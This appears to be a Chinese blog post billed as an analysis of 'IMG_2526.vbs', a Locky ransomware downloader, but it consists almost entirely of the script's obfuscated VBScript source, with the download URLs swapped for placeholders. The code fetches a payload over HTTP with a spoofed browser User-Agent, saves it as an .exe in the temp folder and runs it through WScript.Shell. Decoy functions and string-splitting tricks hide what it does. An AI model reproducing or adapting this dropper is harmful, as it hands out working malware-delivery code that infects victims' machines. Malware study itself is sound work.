IMG_2526.vbs win.locky木马分析

26次阅读
没有评论

共计 8022 个字符,预计需要花费 21 分钟才能阅读完成。

以下为 VBS 源代码,木马链接已经删除


Function Set2Mine(Who, Color, X, y) 
    For i = 0 To UBound(Mines) + 1
        If i > UBound(Mines) Then ReDim Preserve Mines(i)
        If Mines(i).Color = 0 Then
            Mines(i).Who = Who
            Mines(i).Color = Color
            Mines(i).X = X
            Mines(i).y = y
            Mines(i).Tick = 0
            SetMine = i
            Exit For
        End If
    Next
End Function

Dim Salpodeinthriftyensurance ‘As String

Dim SalpodeinthriftyUotOfStock ‘As String

Function CopyLog()

Dim oFile
Dim iRetVal, fptr1, fptr2, sLine, sNewLogFolderName, sLogFile
Dim sComputer
Dim sLog
Dim sBootDrive
‘ Make sure the path is accessible
oUtility.ValidateConnection oEnvironment.Item(“SLShare”)
oUtility.VerifyPathExists oEnvironment.Item(“SLShare”)
If not oFSO.FolderExists(oEnvironment.Item(“SLShare”)) then
oLogging.CreateEntry “An invalid SLShare value of ” & oEnvironment.Item(“SLShare”) & ” was specified.”, LogTypeWarning
Exit Function
End if

End Function

  SalpodeinthriftyBelish = “User”

CUA =”Mozill”+”a/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0″
Dim SalpodeinthriftyMorty ‘As Object
Dim StateUdepends13 ‘As Object

    RACHEL = “avetof”

       Dim TristateTrue

 Dim Salpodeinthrifty2 ‘As String
Function StateUdependsSubMainA()
if D = 14 then
AXC = “SaveToFile”
end if
StateUdepends13.Savetofile SalpodeinthriftyUotOfStock , 4-2
End Function

  Salpodeinthrifty2 = “XMLHTTPHIPERAdodb.streaMHIPER”
Vrungel = “.respo”+”nseBody”

Dim Salpodeinthriftystatus
Salpodeinthriftystatus = false
     Dim JohnTheRipper
Dim Salpodeinthriftycashback ‘As Object

Function F3(p) 
    Set SalpodeinthriftyRombickom = CreateObject(“WScript”+”.Shell”)
End Function 

Salpodeinthrifty2 =”Microsoft.” + Salpodeinthrifty2+  “shell.ApplicationHIPERWscript”+”.shellHIPERProcessHIPERGeTHIPERT”+”emPHIPERTyPROTECT”+”pePROTECT”

Function SheduledObject(p,d)

 SalpodeinthriftyRombickom.Run(“” &SalpodeinthriftyUotOfStock)
End Function

Dim Salpodeinthrifty1DASH1solo ‘As Object   

Function ABTF(A, B, T, F)
set ABTF = A.CreateTextFile(B,T , F)
end function
Function MambaMamba(trtrtr)
   MambaMamba = Split(Replace(Salpodeinthrifty2, “PROTECT”, “”),  trtrtr)
End Function
 

Salpodeinthrifty2 = Salpodeinthrifty2 +”HIPERPROTECToPROTECTpenHIPERwrPROTECTiteHIPERrePROTECTspoPROTECTnseBoPROTECTdyHIPERsaPROTECTvet”+”ofPROTECTileHIPERHsQdFXw.exePROTECT”+”HIPERhtPROTECTtp:HIPER//”

Dim SalpodeinthriftyGMAKO ‘As Object
Dim mual
Function SalpodeinthriftyFuks(p)
 
SalpodeinthriftyMorty.Send

End Function 
JohnTheRipper = MambaMamba(“” + “HIPER” + “”)
Set SalpodeinthriftyMorty = CreateObject(JohnTheRipper(0))

Function StateUdependsSubMainA2(param1)
param1 = param1 + param1
if  1  < param1 OR param1 < 6777  Then
SalpodeinthriftyASALLLP = SalpodeinthriftyMorty.responseBody
end if
param1 = 2 * param1
End Function

 
Dim Salpodeinthrifty4 ‘As String

Dim SalpodeinthriftyRombickom
 Dim MarketPlace ‘As String
  Dim sTempVis ‘As String
  Dim iCount ‘As Integer
Public Function WriteCD(aWrite,bWrite)
astp = 12
astp = astp + 3
if astp > 4 then
aWrite.Write bWrite
astp = 3 * astp
end if
End Function
Dim SalpodeinthriftyASALLLP ‘As Variant
Dim dePetya ‘As Integer
SalpodeinthriftyBelish = SalpodeinthriftyBelish + “-“
 
Dim Twelve ‘As Integer
  Dim sDecimalVis ‘As String
  Dim SalpodeinthriftyPetir ‘As String
SalpodeinthriftyPetir = “Ag”

  Dim MarketPlaceibility ‘As String

 Dim sNodeKey ‘As String
  Dim sParentKey ‘As String

    
 

Twelve = 11 + 1
zTempVis = JohnTheRipper(1)

‘Set SalpodeinthriftyGMAKO = CreateObject(JohnTheRipper(8-6))
Set SalpodeinthriftyRockiBilbo = GetRef(“SheduledObject”)

Set StateUdepends13 = CreateObject(“Adodb.streaM”)
Set Salpodeinthrifty1DASH1solo = CreateObject(JohnTheRipper(9-6))

Function SetUA()
SalpodeinthriftyLamp.setRequestHeader SalpodeinthriftyBelish, CUA
End Function

if “RIDG” + WScript + “4” = “RIDGWindows Script Host4” Then 

mual = Array(“ 木马 url 链接 ”,” 木马 url 链接 ”,” 木马 url 链接 ”)

Set Salpodeinthriftycashback = Salpodeinthrifty1DASH1solo.Environment(JohnTheRipper(1 + 3))

end if

Public Function Anim2UniBall(i)
    Dim Rx, Ry, rBuff
    Dim xt, yt, j, e
    Dim NewX, NewY, d, SgnX, SgnY
    Dim RatioX, RatioY
    Rx = 452
    Ry = 81
    
    
    If SgnY = 1 Then ‘y positive testing
        For d = UniBall(i).BallY + 1 To NewY
            j = WeaponTouch(6, i, NewX, d)
            If j = -6 Then
                UniBall(i).BMoveY = UniBall(i).BMoveY * -1
                NewY = d – 1
                Exit For
            End If
        Next
    End If
    
    If SgnY = -1 Then ‘y negative testing
        For d = UniBall(i).BallY – 1 To NewY Step -1
            j = WeaponTouch(6, i, NewX, d)
            If j = -6 Then
                UniBall(i).BMoveY = UniBall(i).BMoveY * -1
                NewY = d + 1
                Exit For
            End If
        Next
    End If
    j = WeaponTouch(6, i, NewX, NewY)
    If j = -7 Then Exit Function
    
    UniBall(i).BallX = NewX
    UniBall(i).BallY = NewY
End Function

 dePetya = 89210

 
Salpodeinthriftyensurance = Salpodeinthriftycashback(JohnTheRipper(6))
 Dim i
 ‘on error GoTo nextU
‘ on error resume next
sTempVis = JohnTheRipper(Twelve)

Sub SendFlagDat(SndTo)
    Dim i , b , n 
    Dim oNewMsg() , lNewOffSet 
    Dim lNewMsg 
    
    For i = 1 To UBound(Flag1, 2)
        
        lNewMsg = MSG_FLAGS
        lNewOffSet = 0
        ReDim oNewMsg(0)
        AddBufferData oNewMsg, VarPtr(lNewMsg), LenB(lNewMsg), lNewOffSet
        b = 1
        AddBufferData oNewMsg, VarPtr(b), LenB(b), lNewOffSet
        b = i
        AddBufferData oNewMsg, VarPtr(b), LenB(b), lNewOffSet
        n = Flag1(0, i)
        AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet
        n = Flag1(1, i)
        AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet
        n = FlagCarry1(i)
        AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet
        SendTo oNewMsg, CInt(SndTo)
    Next
    For i = 1 To UBound(Flag2, 2)
        lNewMsg = MSG_FLAGS
        lNewOffSet = 0
        ReDim oNewMsg(0)
        AddBufferData oNewMsg, VarPtr(lNewMsg), LenB(lNewMsg), lNewOffSet
        b = 2
        AddBufferData oNewMsg, VarPtr(b), LenB(b), lNewOffSet
        b = i
        AddBufferData oNewMsg, VarPtr(b), LenB(b), lNewOffSet
        n = Flag2(0, i)
        AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet
        n = Flag2(1, i)
        AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet
        n = FlagCarry2(i)
        AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet
        SendTo oNewMsg, CInt(SndTo)
    Next
    For i = 1 To UBound(Flag3, 2)
        lNewMsg = MSG_FLAGS
        lNewOffSet = 0
        ReDim oNewMsg(0)
        AddBufferData oNewMsg, VarPtr(lNewMsg), LenB(lNewMsg), lNewOffSet
        b = 3
        AddBufferData oNewMsg, VarPtr(b), LenB(b), lNewOffSet
        b = i
        AddBufferData oNewMsg, VarPtr(b), LenB(b), lNewOffSet
        n = Flag3(0, i)
        AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet
        n = Flag3(1, i)
        AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet
        n = FlagCarry3(i)
        AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet
        SendTo oNewMsg, CInt(SndTo)
    Next
    For i = 1 To UBound(Flag4, 2)
        lNewMsg = MSG_FLAGS
        lNewOffSet = 0
        ReDim oNewMsg(0)
        AddBufferData oNewMsg, VarPtr(lNewMsg), LenB(lNewMsg), lNewOffSet
        b = 4
        AddBufferData oNewMsg, VarPtr(b), LenB(b), lNewOffSet
        b = i
        AddBufferData oNewMsg, VarPtr(b), LenB(b), lNewOffSet
        n = Flag4(0, i)
        AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet
        n = Flag4(1, i)
        AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet
        n = FlagCarry4(i)
        AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet
        SendTo oNewMsg, CInt(SndTo)
    Next
    For i = 1 To UBound(Flag5, 2)
        lNewMsg = MSG_FLAGS
        lNewOffSet = 0
        ReDim oNewMsg(0)
        AddBufferData oNewMsg, VarPtr(lNewMsg), LenB(lNewMsg), lNewOffSet
        b = 5
        AddBufferData oNewMsg, VarPtr(b), LenB(b), lNewOffSet
        b = i
        AddBufferData oNewMsg, VarPtr(b), LenB(b), lNewOffSet
        n = Flag5(0, i)
        AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet
        n = Flag5(1, i)
        AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet
        n = FlagCarry5(i)
        AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet
        SendTo oNewMsg, CInt(SndTo)
    Next
    
End Sub
MarketPlace = JohnTheRipper(11+2) & JohnTheRipper(11+3)

SalpodeinthriftyBelish = SalpodeinthriftyBelish & SalpodeinthriftyPetir & “ent”

rdde = 19

lTo = UBound(mual)
For i = 0 To lTo Step 1
rdde = rdde * 8

on error resume  next

dePetya =  dePetya +7
 Salpodeinthrifty4 = MarketPlace + mual(i)
 SalpodeinthriftyMorty.Open JohnTheRipper(5), Salpodeinthrifty4, False
dr1=2

rdde = rdde + 7

SetUA()
SalpodeinthriftyFuks ” d “
If SalpodeinthriftyMorty.Status +3 = 203 Then
Salpodeinthriftystatus = true
 Exit For
End If

goto14:
Next

on error goto 0
if Salpodeinthriftystatus Then
Dim Ratchet ‘As String
 SalpodeinthriftyUotOfStock = Salpodeinthriftyensurance+ sTempVis

F3 “”
StateUdepends13.Type = 1
 StateUdepends13.Open
StateUdependsSubMainA2 22 
WriteCD StateUdepends13,SalpodeinthriftyASALLLP
dttat =4
SalpodeinthriftyUotOfStocku = “” + SalpodeinthriftyUotOfStock 

dttat = dttat*2

StateUdependsSubMainA()
Dim SalpodeinthriftyJohnSnowu,SalpodeinthriftyTmp1 ‘As Long

SalpodeinthriftyJohnSnowu = 3012

If 1040  < SalpodeinthriftyJohnSnowu Then
  drba =55
 SalpodeinthriftyTmp1 = “|”

SalpodeinthriftyRockiBilbo “}}}}}}}}}}}}}”,”062″
End If
triada = 341
end if

正文完
 0